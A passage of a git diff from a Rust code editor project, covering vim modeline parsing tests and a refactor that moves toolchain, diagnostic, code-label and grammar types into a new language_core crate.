test_vim_modeline_version_checks() { + // Note: Current implementation doesn't support version checks yet + // These are tests for future implementation based on vim spec + + // Test version-specific modelines (currently ignored in our implementation) + let content = "/* vim700: set foldmethod=marker */"; + // Should be ignored for now since we don't support version checks + assert!(parse_modeline(&[content], &[]).is_none()); + + let content = "/* vim>702: set cole=2: */"; + // Should be ignored for now since we don't support version checks + assert!(parse_modeline(&[content], &[]).is_none()); + } + + #[test] + fn test_vim_modeline_colon_escaping() { + // Test colon escaping as mentioned in vim spec + + // According to vim spec: "if you want to include a ':' in a set command precede it with a '\'" + let content = r#"/* vim: set fdm=expr fde=getline(v\:lnum)=~'{'?'>1'\:'1': */"#; + + let result = parse_modeline(&[content], &[]).unwrap(); + + // The modeline should parse fdm=expr and fde=getline(v:lnum)=~'{'?'>1':'1' + // as extra variables since they're not recognized settings + assert_eq!(result.vim_extra_variables.len(), 2); + assert_eq!( + result.vim_extra_variables[0], + ("fdm".to_string(), Some("expr".to_string())) + ); + assert_eq!( + result.vim_extra_variables[1], + ( + "fde".to_string(), + Some("getline(v:lnum)=~'{'?'>1':'1'".to_string()) + ) + ); + } + + #[test] + fn test_vim_modeline_whitespace_requirements() { + // Test whitespace requirements from vim spec + + // Valid: whitespace before vi/vim + let content = " vim: set ft=rust:"; + assert!(parse_modeline(&[content], &[]).is_some()); + + // Valid: tab before vi/vim + let content = "\tvim: set ft=rust:"; + assert!(parse_modeline(&[content], &[]).is_some()); + + // Valid: vi/vim at start of line (compatibility) + let content = "vim: set ft=rust:"; + assert!(parse_modeline(&[content], &[]).is_some()); + } + + #[test] + fn test_vim_modeline_comprehensive_examples() { + // Real-world examples from vim documentation and common usage + + // Python example + let content = "# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.hard_tabs, Some(false)); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(4).unwrap())); + + // C example with multiple options + let content = "/* vim: set ts=8 sw=8 noet ai cindent: */"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(8).unwrap())); + assert_eq!(settings.hard_tabs, Some(true)); + assert!( + settings + .vim_extra_variables + .contains(&("cindent".to_string(), None)) + ); + + // Shell script example + let content = "# vi: set ft=sh ts=2 sw=2 et:"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("sh".to_string())); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(2).unwrap())); + assert_eq!(settings.hard_tabs, Some(false)); + + // First form colon-separated + let content = "vim:ft=xml:ts=2:sw=2:et"; + let settings = parse_modeline(&[content], &[]).unwrap(); + assert_eq!(settings.mode, Some("xml".to_string())); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(2).unwrap())); + assert_eq!(settings.hard_tabs, Some(false)); + } + + #[test] + fn test_combined_emacs_vim_detection() { + // Test that both emacs and vim modelines can be detected in the same file + + let first_lines = [ + "#!/usr/bin/env python3", + "# -*- require-final-newline: t; -*-", + "# vim: set ft=python ts=4 sw=4 et:", + ]; + + // Should find the emacs modeline first (with coding) + let settings = parse_modeline(&first_lines, &[]).unwrap(); + assert_eq!(settings.ensure_final_newline, Some(true)); + assert_eq!(settings.tab_size, None); + + // Test vim-only content + let vim_only = ["# vim: set ft=python ts=4 sw=4 et:"]; + let settings = parse_modeline(&vim_only, &[]).unwrap(); + assert_eq!(settings.mode, Some("python".to_string())); + assert_eq!(settings.tab_size, Some(NonZeroU32::new(4).unwrap())); + assert_eq!(settings.hard_tabs, Some(false)); + } +} diff --git a/crates/language/src/proto.rs b/crates/language/src/proto.rs index 89c44513067f6d2309d68a9f38984988358d8877..5e3179e929da012cce8e7da6b436e89c0c4519de 100644 --- a/crates/language/src/proto.rs +++ b/crates/language/src/proto.rs @@ -174,11 +174,11 @@ pub fn serialize_selection(selection: &Selection) -> proto::Selection { id: selection.id as u64, start: Some(proto::EditorAnchor { anchor: Some(serialize_anchor(&selection.start)), - excerpt_id: 0, + excerpt_id: None, }), end: Some(proto::EditorAnchor { anchor: Some(serialize_anchor(&selection.end)), - excerpt_id: 0, + excerpt_id: None, }), reversed: selection.reversed, } @@ -260,7 +260,7 @@ pub fn serialize_anchor(anchor: &Anchor) -> proto::Anchor { Bias::Left => proto::Bias::Left as i32, Bias::Right => proto::Bias::Right as i32, }, - buffer_id: anchor.buffer_id.map(Into::into), + buffer_id: Some(anchor.buffer_id.into()), } } @@ -498,7 +498,7 @@ pub fn deserialize_anchor(anchor: proto::Anchor) -> Option { timestamp, anchor.offset as u32, bias, - buffer_id, + buffer_id?, )) } diff --git a/crates/language/src/syntax_map.rs b/crates/language/src/syntax_map.rs index bd24424679f3e6cb02303c91e0d86db335cd0a26..b73276ffd92be8915e2272b5242770fc52854af1 100644 --- a/crates/language/src/syntax_map.rs +++ b/crates/language/src/syntax_map.rs @@ -13,12 +13,12 @@ use std::{ collections::BinaryHeap, fmt, iter, ops::{ControlFlow, Deref, DerefMut, Range}, - sync::Arc, + sync::{Arc, LazyLock}, time::{Duration, Instant}, }; use streaming_iterator::StreamingIterator; use sum_tree::{Bias, Dimensions, SeekTarget, SumTree}; -use text::{Anchor, BufferSnapshot, OffsetRangeExt, Point, Rope, ToOffset, ToPoint}; +use text::{Anchor, BufferId, BufferSnapshot, OffsetRangeExt, Point, Rope, ToOffset, ToPoint}; use tree_sitter::{ Node, Query, QueryCapture, QueryCaptures, QueryCursor, QueryMatch, QueryMatches, QueryPredicateArg, @@ -40,6 +40,35 @@ pub struct SyntaxSnapshot { update_count: usize, } +// Dropping deep treesitter Trees can be quite slow due to deallocating lots of memory. +// To avoid blocking the main thread, we offload the drop operation to a background thread. +impl Drop for SyntaxSnapshot { + fn drop(&mut self) { + static DROP_TX: LazyLock>> = + LazyLock::new(|| { + let (tx, rx) = std::sync::mpsc::channel(); + std::thread::Builder::new() + .name("SyntaxSnapshot::drop".into()) + .spawn(move || while let Ok(_) = rx.recv() {}) + .expect("failed to spawn drop thread"); + tx + }); + // This does allocate a new Arc, but it's cheap and avoids blocking the main thread without needing to use an `Option` or `MaybeUninit`. + let _ = DROP_TX.send(std::mem::replace( + &mut self.layers, + SumTree::from_summary(SyntaxLayerSummary { + min_depth: Default::default(), + max_depth: Default::default(), + // Deliberately bogus anchors, doesn't matter in this context + range: Anchor::min_min_range_for_buffer(BufferId::new(1).unwrap()), + last_layer_range: Anchor::min_min_range_for_buffer(BufferId::new(1).unwrap()), + last_layer_language: Default::default(), + contains_unknown_injections: Default::default(), + }), + )); + } +} + #[derive(Default)] pub struct SyntaxMapCaptures<'a> { layers: Vec>, @@ -567,7 +596,7 @@ impl SyntaxSnapshot { let bounded_position = SyntaxLayerPositionBeforeChange { position: position.clone(), - change: changed_regions.start_position(), + change: changed_regions.start_position(text.remote_id()), }; if bounded_position.cmp(cursor.start(), text).is_gt() { let slice = cursor.slice(&bounded_position, Bias::Left); @@ -1100,7 +1129,7 @@ impl<'a> SyntaxMapCaptures<'a> { let grammar_index = result .grammars .iter() - .position(|g| g.id == grammar.id()) + .position(|g| g.id() == grammar.id()) .unwrap_or_else(|| { result.grammars.push(grammar); result.grammars.len() - 1 @@ -1244,7 +1273,7 @@ impl<'a> SyntaxMapMatches<'a> { let grammar_index = result .grammars .iter() - .position(|g| g.id == grammar.id()) + .position(|g| g.id() == grammar.id()) .unwrap_or_else(|| { result.grammars.push(grammar); result.grammars.len() - 1 @@ -1925,11 +1954,11 @@ impl ChangedRegion { } impl ChangeRegionSet { - fn start_position(&self) -> ChangeStartPosition { + fn start_position(&self, buffer_id: BufferId) -> ChangeStartPosition { self.0.first().map_or( ChangeStartPosition { depth: usize::MAX, - position: Anchor::MAX, + position: Anchor::max_for_buffer(buffer_id), }, |region| ChangeStartPosition { depth: region.depth, @@ -1978,32 +2007,28 @@ impl ChangeRegionSet { } } -impl Default for SyntaxLayerSummary { - fn default() -> Self { +impl sum_tree::Summary for SyntaxLayerSummary { + type Context<'a> = &'a BufferSnapshot; + + fn zero(buffer: &BufferSnapshot) -> Self { Self { max_depth: 0, min_depth: 0, - range: Anchor::MAX..Anchor::MIN, - last_layer_range: Anchor::MIN..Anchor::MAX, + range: Anchor::max_for_buffer(buffer.remote_id()) + ..Anchor::min_for_buffer(buffer.remote_id()), + last_layer_range: Anchor::min_for_buffer(buffer.remote_id()) + ..Anchor::max_for_buffer(buffer.remote_id()), last_layer_language: None, contains_unknown_injections: false, } } -} - -impl sum_tree::Summary for SyntaxLayerSummary { - type Context<'a> = &'a BufferSnapshot; - - fn zero(_cx: &BufferSnapshot) -> Self { - Default::default() - } fn add_summary(&mut self, other: &Self, buffer: Self::Context<'_>) { if other.max_depth > self.max_depth { self.max_depth = other.max_depth; self.range = other.range.clone(); } else { - if self.range == (Anchor::MAX..Anchor::MAX) { + if self.range.start.is_max() && self.range.end.is_max() { self.range.start = other.range.start; } if other.range.end.cmp(&self.range.end, buffer).is_gt() { diff --git a/crates/language/src/syntax_map/syntax_map_tests.rs b/crates/language/src/syntax_map/syntax_map_tests.rs index b7fec897b98aed7902cd25de65e008ba58ee55f9..247076b6f25e3cf62913c93d65ae352109effafa 100644 --- a/crates/language/src/syntax_map/syntax_map_tests.rs +++ b/crates/language/src/syntax_map/syntax_map_tests.rs @@ -1492,7 +1492,7 @@ fn python_lang() -> Language { ) .with_queries(LanguageQueries { injections: Some(Cow::from(include_str!( - "../../../languages/src/python/injections.scm" + "../../../grammars/src/python/injections.scm" ))), ..Default::default() }) diff --git a/crates/language/src/task_context.rs b/crates/language/src/task_context.rs index b8cc6d13fff14576ca938e36d8982973f6307912..dc59d21bd73a2d4a8e1d4a4c765195afffd2ce67 100644 --- a/crates/language/src/task_context.rs +++ b/crates/language/src/task_context.rs @@ -1,11 +1,11 @@ use std::{ops::Range, path::PathBuf, sync::Arc}; -use crate::{File, LanguageToolchainStore, Location, Runnable}; +use crate::{Buffer, LanguageToolchainStore, Location, Runnable}; use anyhow::Result; use collections::HashMap; use fs::Fs; -use gpui::{App, Task}; +use gpui::{App, Entity, Task}; use lsp::LanguageServerName; use task::{TaskTemplates, TaskVariables}; use text::BufferId; @@ -37,7 +37,7 @@ pub trait ContextProvider: Send + Sync { } /// Provides all tasks, associated with the current language. - fn associated_tasks(&self, _: Option>, _: &App) -> Task> { + fn associated_tasks(&self, _: Option>, _: &App) -> Task> { Task::ready(None) } diff --git a/crates/language/src/toolchain.rs b/crates/language/src/toolchain.rs index 0d80f84e7ec1dc330db823a0938421a1f5ad85c9..d33700b1724f964597c66d9df0bc792210c96e42 100644 --- a/crates/language/src/toolchain.rs +++ b/crates/language/src/toolchain.rs @@ -4,95 +4,21 @@ //! which is a set of tools used to interact with the projects written in said language. //! For example, a Python project can have an associated virtual environment; a Rust project can have a toolchain override. -use std::{ - path::{Path, PathBuf}, - sync::Arc, -}; +use std::{path::PathBuf, sync::Arc}; use async_trait::async_trait; use collections::HashMap; -use fs::Fs; + use futures::future::BoxFuture; -use gpui::{App, AsyncApp, SharedString}; +use gpui::{App, AsyncApp}; use settings::WorktreeId; use task::ShellKind; use util::rel_path::RelPath; -use crate::{LanguageName, ManifestName}; - -/// Represents a single toolchain. -#[derive(Clone, Eq, Debug)] -pub struct Toolchain { - /// User-facing label - pub name: SharedString, - /// Absolute path - pub path: SharedString, - pub language_name: LanguageName, - /// Full toolchain data (including language-specific details) - pub as_json: serde_json::Value, -} - -/// Declares a scope of a toolchain added by user. -/// -/// When the user adds a toolchain, we give them an option to see that toolchain in: -/// - All of their projects -/// - A project they're currently in. -/// - Only in the subproject they're currently in. -#[derive(Clone, Debug, Eq, PartialEq, Ord, PartialOrd)] -pub enum ToolchainScope { - Subproject(Arc, Arc), - Project, - /// Available in all projects on this box. It wouldn't make sense to show suggestions across machines. - Global, -} - -impl ToolchainScope { - pub fn label(&self) -> &'static str { - match self { - ToolchainScope::Subproject(_, _) => "Subproject", - ToolchainScope::Project => "Project", - ToolchainScope::Global => "Global", - } - } - - pub fn description(&self) -> &'static str { - match self { - ToolchainScope::Subproject(_, _) => { - "Available only in the subproject you're currently in." - } - ToolchainScope::Project => "Available in all locations in your current project.", - ToolchainScope::Global => "Available in all of your projects on this machine.", - } - } -} - -impl std::hash::Hash for Toolchain { - fn hash(&self, state: &mut H) { - let Self { - name, - path, - language_name, - as_json: _, - } = self; - name.hash(state); - path.hash(state); - language_name.hash(state); - } -} +use crate::LanguageName; -impl PartialEq for Toolchain { - fn eq(&self, other: &Self) -> bool { - let Self { - name, - path, - language_name, - as_json: _, - } = self; - // Do not use as_json for comparisons; it shouldn't impact equality, as it's not user-surfaced. - // Thus, there could be multiple entries that look the same in the UI. - (name, path, language_name).eq(&(&other.name, &other.path, &other.language_name)) - } -} +// Re-export core data types from language_core. +pub use language_core::{Toolchain, ToolchainList, ToolchainMetadata, ToolchainScope}; #[async_trait] pub trait ToolchainLister: Send + Sync + 'static { @@ -102,7 +28,6 @@ pub trait ToolchainLister: Send + Sync + 'static { worktree_root: PathBuf, subroot_relative_path: Arc, project_env: Option>, - fs: &dyn Fs, ) -> ToolchainList; /// Given a user-created toolchain, resolve lister-specific details. @@ -111,7 +36,6 @@ pub trait ToolchainLister: Send + Sync + 'static { &self, path: PathBuf, project_env: Option>, - fs: &dyn Fs, ) -> anyhow::Result; fn activation_script( @@ -125,16 +49,6 @@ pub trait ToolchainLister: Send + Sync + 'static { fn meta(&self) -> ToolchainMetadata; } -#[derive(Clone, PartialEq, Eq, Hash)] -pub struct ToolchainMetadata { - /// Returns a term which we should use in UI to refer to toolchains produced by a given `[ToolchainLister]`. - pub term: SharedString, - /// A user-facing placeholder describing the semantic meaning of a path to a new toolchain. - pub new_toolchain_placeholder: SharedString, - /// The name of the manifest file for this toolchain. - pub manifest_name: ManifestName, -} - #[async_trait(?Send)] pub trait LanguageToolchainStore: Send + Sync + 'static { async fn active_toolchain( @@ -168,31 +82,3 @@ impl LanguageToolchainStore for T { self.active_toolchain(worktree_id, &relative_path, language_name, cx) } } - -type DefaultIndex = usize; -#[derive(Default, Clone, Debug)] -pub struct ToolchainList { - pub toolchains: Vec, - pub default: Option, - pub groups: Box<[(usize, SharedString)]>, -} - -impl ToolchainList { - pub fn toolchains(&self) -> &[Toolchain] { - &self.toolchains - } - pub fn default_toolchain(&self) -> Option { - self.default.and_then(|ix| self.toolchains.get(ix)).cloned() - } - pub fn group_for_index(&self, index: usize) -> Option<(usize, SharedString)> { - if index >= self.toolchains.len() { - return None; - } - let first_equal_or_greater = self - .groups - .partition_point(|(group_lower_bound, _)| group_lower_bound <= &index); - self.groups - .get(first_equal_or_greater.checked_sub(1)?) - .cloned() - } -} diff --git a/crates/language_core/Cargo.toml b/crates/language_core/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..4861632b4663c860706525c65cd8607133b3ec71 --- /dev/null +++ b/crates/language_core/Cargo.toml @@ -0,0 +1,29 @@ +[package] +name = "language_core" +version = "0.1.0" +edition = "2024" +publish = false + +[lib] +path = "src/language_core.rs" + +[dependencies] +anyhow.workspace = true +collections.workspace = true +gpui.workspace = true +log.workspace = true +lsp.workspace = true +parking_lot.workspace = true +regex.workspace = true +schemars.workspace = true +serde.workspace = true +serde_json.workspace = true +toml.workspace = true +tree-sitter.workspace = true +util.workspace = true + +[dev-dependencies] +gpui = { workspace = true, features = ["test-support"] } + +[features] +test-support = [] diff --git a/crates/rich_text/LICENSE-GPL b/crates/language_core/LICENSE-GPL similarity index 100% rename from crates/rich_text/LICENSE-GPL rename to crates/language_core/LICENSE-GPL diff --git a/crates/language_core/src/code_label.rs b/crates/language_core/src/code_label.rs new file mode 100644 index 0000000000000000000000000000000000000000..0a98743d02b3861d248498893eef3972422d4758 --- /dev/null +++ b/crates/language_core/src/code_label.rs @@ -0,0 +1,122 @@ +use crate::highlight_map::HighlightId; +use std::ops::Range; + +#[derive(Debug, Clone)] +pub struct Symbol { + pub name: String, + pub kind: lsp::SymbolKind, + pub container_name: Option, +} + +#[derive(Clone, Debug, Default, PartialEq, Eq)] +pub struct CodeLabel { + /// The text to display. + pub text: String, + /// Syntax highlighting runs. + pub runs: Vec<(Range, HighlightId)>, + /// The portion of the text that should be used in fuzzy filtering. + pub filter_range: Range, +} + +#[derive(Clone, Debug, Default, PartialEq, Eq)] +pub struct CodeLabelBuilder { + /// The text to display. + text: String, + /// Syntax highlighting runs. + runs: Vec<(Range, HighlightId)>, + /// The portion of the text that should be used in fuzzy filtering. + filter_range: Range, +} + +impl CodeLabel { + pub fn plain(text: String, filter_text: Option<&str>) -> Self { + Self::filtered(text.clone(), text.len(), filter_text, Vec::new()) + } + + pub fn filtered( + text: String, + label_len: usize, + filter_text: Option<&str>, + runs: Vec<(Range, HighlightId)>, + ) -> Self { + assert!(label_len <= text.len()); + let filter_range = filter_text + .and_then(|filter| text.find(filter).map(|index| index..index + filter.len())) + .unwrap_or(0..label_len); + Self::new(text, filter_range, runs) + } + + pub fn new( + text: String, + filter_range: Range, + runs: Vec<(Range, HighlightId)>, + ) -> Self { + assert!( + text.get(filter_range.clone()).is_some(), + "invalid filter range" + ); + runs.iter().for_each(|(range, _)| { + assert!( + text.get(range.clone()).is_some(), + "invalid run range with inputs. Requested range {range:?} in text '{text}'", + ); + }); + Self { + runs, + filter_range, + text, + } + } + + pub fn text(&self) -> &str { + self.text.as_str() + } + + pub fn filter_text(&self) -> &str { + &self.text[self.filter_range.clone()] + } +} + +impl From for CodeLabel { + fn from(value: String) -> Self { + Self::plain(value, None) + } +} + +impl From<&str> for CodeLabel { + fn from(value: &str) -> Self { + Self::plain(value.to_string(), None) + } +} + +impl CodeLabelBuilder { + pub fn respan_filter_range(&mut self, filter_text: Option<&str>) { + self.filter_range = filter_text + .and_then(|filter| { + self.text + .find(filter) + .map(|index| index..index + filter.len()) + }) + .unwrap_or(0..self.text.len()); + } + + pub fn push_str(&mut self, text: &str, highlight: Option) { + let start_index = self.text.len(); + self.text.push_str(text); + if let Some(highlight) = highlight { + let end_index = self.text.len(); + self.runs.push((start_index..end_index, highlight)); + } + } + + pub fn build(mut self) -> CodeLabel { + if self.filter_range.end == 0 { + self.respan_filter_range(None); + } + CodeLabel { + text: self.text, + runs: self.runs, + filter_range: self.filter_range, + } + } +} diff --git a/crates/language_core/src/diagnostic.rs b/crates/language_core/src/diagnostic.rs new file mode 100644 index 0000000000000000000000000000000000000000..9a468a14b863a94ef23e00c3e15edd9fa2d8b09a --- /dev/null +++ b/crates/language_core/src/diagnostic.rs @@ -0,0 +1,76 @@ +use gpui::SharedString; +use lsp::{DiagnosticSeverity, NumberOrString}; +use serde::{Deserialize, Serialize}; +use serde_json::Value; + +/// A diagnostic associated with a certain range of a buffer. +#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)] +pub struct Diagnostic { + /// The name of the service that produced this diagnostic. + pub source: Option, + /// The ID provided by the dynamic registration that produced this diagnostic. + pub registration_id: Option, + /// A machine-readable code that identifies this diagnostic. + pub code: Option, + pub code_description: Option, + /// Whether this diagnostic is a hint, warning, or error. + pub severity: DiagnosticSeverity, + /// The human-readable message associated with this diagnostic. + pub message: String, + /// The human-readable message (in markdown format) + pub markdown: Option, + /// An id that identifies the group to which this diagnostic belongs. + /// + /// When a language server produces a diagnostic with + /// one or more associated diagnostics, those diagnostics are all + /// assigned a single group ID. + pub group_id: usize, + /// Whether this diagnostic is the primary diagnostic for its group. + /// + /// In a given group, the primary diagnostic is the top-level diagnostic + /// returned by the language server. The non-primary diagnostics are the + /// associated diagnostics. + pub is_primary: bool, + /// Whether this diagnostic is considered to originate from an analysis of + /// files on disk, as opposed to any unsaved buffer contents. This is a + /// property of a given diagnostic source, and is configured for a given + /// language server via the `LspAdapter::disk_based_diagnostic_sources` method + /// for the language server. + pub is_disk_based: bool, + /// Whether this diagnostic marks unnecessary code. + pub is_unnecessary: bool, + /// Quick separation of diagnostics groups based by their source. + pub source_kind: DiagnosticSourceKind, + /// Data from language server that produced this diagnostic. Passed back to the LS when we request code actions for this diagnostic. + pub data: Option, + /// Whether to underline the corresponding text range in the editor. + pub underline: bool, +} + +#[derive(Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize)] +pub enum DiagnosticSourceKind { + Pulled, + Pushed, + Other, +} + +impl Default for Diagnostic { + fn default() -> Self { + Self { + source: Default::default(), + source_kind: DiagnosticSourceKind::Other, + code: None, + code_description: None, + severity: DiagnosticSeverity::ERROR, + message: Default::default(), + markdown: None, + group_id: 0, + is_primary: false, + is_disk_based: false, + is_unnecessary: false, + underline: true, + data: None, + registration_id: None, + } + } +} diff --git a/crates/language_core/src/grammar.rs b/crates/language_core/src/grammar.rs new file mode 100644 index 0000000000000000000000000000000000000000..54e9a3f1b3309718436b206874802779925a9d04 --- /dev/null +++ b/crates/language_core/src/grammar.rs @@ -0,0 +1,755 @@ +use crate::{ + HighlightId, HighlightMap, LanguageConfig, LanguageConfigOverride, LanguageName, + LanguageQueries, language_config::BracketPairConfig, +}; +use anyhow::{Context as _, Result}; +use collections::HashMap; +use gpui::SharedString; +use lsp::LanguageServerName; +use parking_lot::Mutex; +use std::sync::atomic::{AtomicUsize, Ordering::SeqCst}; +use tree_sitter::Query; + +pub static NEXT_GRAMMAR_ID: AtomicUsize = AtomicUsize::new(0); + +#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)] +pub struct GrammarId(pub usize); + +impl GrammarId { + pub fn new() -> Self { + Self(NEXT_GRAMMAR_ID.fetch_add(1, SeqCst)) + } +} + +impl Default for GrammarId { + fn default() -> Self { + Self::new() + } +} + +pub struct Grammar { + id: GrammarId, + pub ts_language: tree_sitter::Language, + pub error_query: Option, + pub highlights_config: Option, + pub brackets_config: Option, + pub redactions_config: Option, + pub runnable_config: Option, + pub indents_config: Option, + pub outline_config: Option, + pub text_object_config: Option, + pub injection_config: Option, + pub override_config: Option, + pub debug_variables_config: Option, + pub highlight_map: Mutex, +} + +pub struct HighlightsConfig { + pub query: Query, + pub identifier_capture_indices: Vec, +} + +pub struct IndentConfig { + pub query: Query, + pub indent_capture_ix: u32, + pub start_capture_ix: Option, + pub end_capture_ix: Option, + pub outdent_capture_ix: Option, + pub suffixed_start_captures: HashMap, +} + +pub struct OutlineConfig { + pub query: Query, + pub item_capture_ix: u32, + pub name_capture_ix: u32, + pub context_capture_ix: Option, + pub extra_context_capture_ix: Option, + pub open_capture_ix: Option, + pub close_capture_ix: Option, + pub annotation_capture_ix: Option, +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub enum DebuggerTextObject { + Variable, + Scope, +} + +impl DebuggerTextObject { + pub fn from_capture_name(name: &str) -> Option { + match name { + "debug-variable" => Some(DebuggerTextObject::Variable), + "debug-scope" => Some(DebuggerTextObject::Scope), + _ => None, + } + } +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub enum TextObject { + InsideFunction, + AroundFunction, + InsideClass, + AroundClass, + InsideComment, + AroundComment, +} + +impl TextObject { + pub fn from_capture_name(name: &str) -> Option { + match name { + "function.inside" => Some(TextObject::InsideFunction), + "function.around" => Some(TextObject::AroundFunction), + "class.inside" => Some(TextObject::InsideClass), + "class.around" => Some(TextObject::AroundClass), + "comment.inside" => Some(TextObject::InsideComment), + "comment.around" => Some(TextObject::AroundComment), + _ => None, + } + } + + pub fn around(&self) -> Option { + match self { + TextObject::InsideFunction => Some(TextObject::AroundFunction), + TextObject::InsideClass => Some(TextObject::AroundClass), + TextObject::InsideComment => Some(TextObject::AroundComment), + _ => None, + } + } +} + +pub struct TextObjectConfig { + pub query: Query, + pub text_objects_by_capture_ix: Vec<(u32, TextObject)>, +} + +pub struct InjectionConfig { + pub query: Query, + pub content_capture_ix: u32, + pub language_capture_ix: Option, + pub patterns: Vec, +} + +pub struct RedactionConfig { + pub query: Query, + pub redaction_capture_ix: u32, +} + +#[derive(Clone, Debug, PartialEq)] +pub enum RunnableCapture { + Named(SharedString), + Run, +} + +pub struct RunnableConfig { + pub query: Query, + /// A mapping from capture index to capture kind + pub extra_captures: Vec, +} + +pub struct OverrideConfig { + pub query: Query, + pub values: HashMap, +} + +#[derive(Debug)] +pub struct OverrideEntry { + pub name: String, + pub range_is_inclusive: bool, + pub value: LanguageConfigOverride, +} + +#[derive(Default, Clone)] +pub struct InjectionPatternConfig { + pub language: Option>, + pub combined: bool, +} + +#[derive(Debug)] +pub struct BracketsConfig { + pub query: Query, + pub open_capture_ix: u32, + pub close_capture_ix: u32, + pub patterns: Vec, +} + +#[derive(Clone, Debug, Default)] +pub struct BracketsPatternConfig { + pub newline_only: bool, + pub rainbow_exclude: bool, +} + +pub struct DebugVariablesConfig { + pub query: Query, + pub objects_by_capture_ix: Vec<(u32, DebuggerTextObject)>, +} + +enum Capture<'a> { + Required(&'static str, &'a mut u32), + Optional(&'static str, &'a mut Option), +} + +fn populate_capture_indices( + query: &Query, + language_name: &LanguageName, + query_type: &str, + expected_prefixes: &[&str], + captures: &mut [Capture<'_>], +) -> bool { + let mut found_required_indices = Vec::new(); + 'outer: for (ix, name) in query.capture_names().iter().enumerate() { + for (required_ix, capture) in captures.iter_mut().enumerate() { + match capture { + Capture::Required(capture_name, index) if capture_name == name => { + **index = ix as u32; + found_required_indices.push(required_ix); + continue 'outer; + } + Capture::Optional(capture_name, index) if capture_name == name => { + **index = Some(ix as u32); + continue 'outer; + } + _ => {} + } + } + if !name.starts_with("_") + && !expected_prefixes + .iter() + .any(|&prefix| name.starts_with(prefix)) + { + log::warn!( + "unrecognized capture name '{}' in {} {} TreeSitter query \ + (suppress this warning by prefixing with '_')", + name, + language_name, + query_type + ); + } + } + let mut missing_required_captures = Vec::new(); + for (capture_ix, capture) in captures.iter().enumerate() { + if let Capture::Required(capture_name, _) = capture + && !found_required_indices.contains(&capture_ix) + { + missing_required_captures.push(*capture_name); + } + } + let success = missing_required_captures.is_empty(); + if !success { + log::error!( + "missing required capture(s) in {} {} TreeSitter query: {}", + language_name, + query_type, + missing_required_captures.join(", ") + ); + } + success +} + +impl Grammar { + pub fn new(ts_language: tree_sitter::Language) -> Self { + Self { + id: GrammarId::new(), + highlights_config: None, + brackets_config: None, + outline_config: None, + text_object_config: None, + indents_config: None, + injection_config: None, + override_config: None, + redactions_config: None, + runnable_config: None, + error_query: Query::new(&ts_language, "(ERROR) @error").ok(), + debug_variables_config: None, + ts_language, + highlight_map: Default::default(), + } + } + + pub fn id(&self) -> GrammarId { + self.id + } + + pub fn highlight_map(&self) -> HighlightMap { + self.highlight_map.lock().clone() + } + + pub fn highlight_id_for_name(&self, name: &str) -> Option { + self.highlights_config + .as_ref()? + .query + .capture_index_for_name(name) + .and_then(|capture_id| self.highlight_map.lock().get(capture_id)) + } + + pub fn debug_variables_config(&self) -> Option<&DebugVariablesConfig> { + self.debug_variables_config.as_ref() + } + + /// Load all queries from `LanguageQueries` into this grammar, mutating the + /// associated `LanguageConfig` (the override query clears + /// `brackets.disabled_scopes_by_bracket_ix`). + pub fn with_queries( + mut self, + queries: LanguageQueries, + config: &mut LanguageConfig, + ) -> Result { + let name = &config.name; + if let Some(query) = queries.highlights { + self = self + .with_highlights_query(query.as_ref()) + .context("Error loading highlights query")?; + } + if let Some(query) = queries.brackets { + self = self + .with_brackets_query(query.as_ref(), name) + .context("Error loading brackets query")?; + } + if let Some(query) = queries.indents { + self = self + .with_indents_query(query.as_ref(), name) + .context("Error loading indents query")?; + } + if let Some(query) = queries.outline { + self = self + .with_outline_query(query.as_ref(), name) + .context("Error loading outline query")?; + } + if let Some(query) = queries.injections { + self = self + .with_injection_query(query.as_ref(), name) + .context("Error loading injection query")?; + } + if let Some(query) = queries.overrides { + self = self + .with_override_query( + query.as_ref(), + name, + &config.overrides, + &mut config.brackets, + &config.scope_opt_in_language_servers, + ) + .context("Error loading override query")?; + } + if let Some(query) = queries.redactions { + self = self + .with_redaction_query(query.as_ref(), name) + .context("Error loading redaction query")?; + } + if let Some(query) = queries.runnables { + self = self + .with_runnable_query(query.as_ref()) + .context("Error loading runnables query")?; + } + if let Some(query) = queries.text_objects { + self = self + .with_text_object_query(query.as_ref(), name) + .context("Error loading textobject query")?; + } + if let Some(query) = queries.debugger { + self = self + .with_debug_variables_query(query.as_ref(), name) + .context("Error loading debug variables query")?; + } + Ok(self) + } + + pub fn with_highlights_query(mut self, source: &str) -> Result { + let query = Query::new(&self.ts_language, source)?; + + let mut identifier_capture_indices = Vec::new(); + for name in [ + "variable", + "constant", + "constructor", + "function", + "function.method", + "function.method.call", + "function.special", + "property", + "type", + "type.interface", + ] { + identifier_capture_indices.extend(query.capture_index_for_name(name)); + } + + self.highlights_config = Some(HighlightsConfig { + query, + identifier_capture_indices, + }); + + Ok(self) + } + + pub fn with_runnable_query(mut self, source: &str) -> Result { + let query = Query::new(&self.ts_language, source)?; + let extra_captures: Vec<_> = query + .capture_names() + .iter() + .map(|&name| match name { + "run" => RunnableCapture::Run, + name => RunnableCapture::Named(name.to_string().into()), + }) + .collect(); + + self.runnable_config = Some(RunnableConfig { + extra_captures, + query, + }); + + Ok(self) + } + + pub fn with_outline_query( + mut self, + source: &str, + language_name: &LanguageName, + ) -> Result { + let query = Query::new(&self.ts_language, source)?; + let mut item_capture_ix = 0; + let mut name_capture_ix = 0; + let mut context_capture_ix = None; + let mut extra_context_capture_ix = None; + let mut open_capture_ix = None; + let mut close_capture_ix = None; + let mut annotation_capture_ix = None; + if populate_capture_indices( + &query, + language_name, + "outline", + &[], + &mut [ + Capture::Required("item", &mut item_capture_ix), + Capture::Required("name", &mut name_capture_ix), + Capture::Optional("context", &mut context_capture_ix), + Capture::Optional("context.extra", &mut extra_context_capture_ix), + Capture::Optional("open", &mut 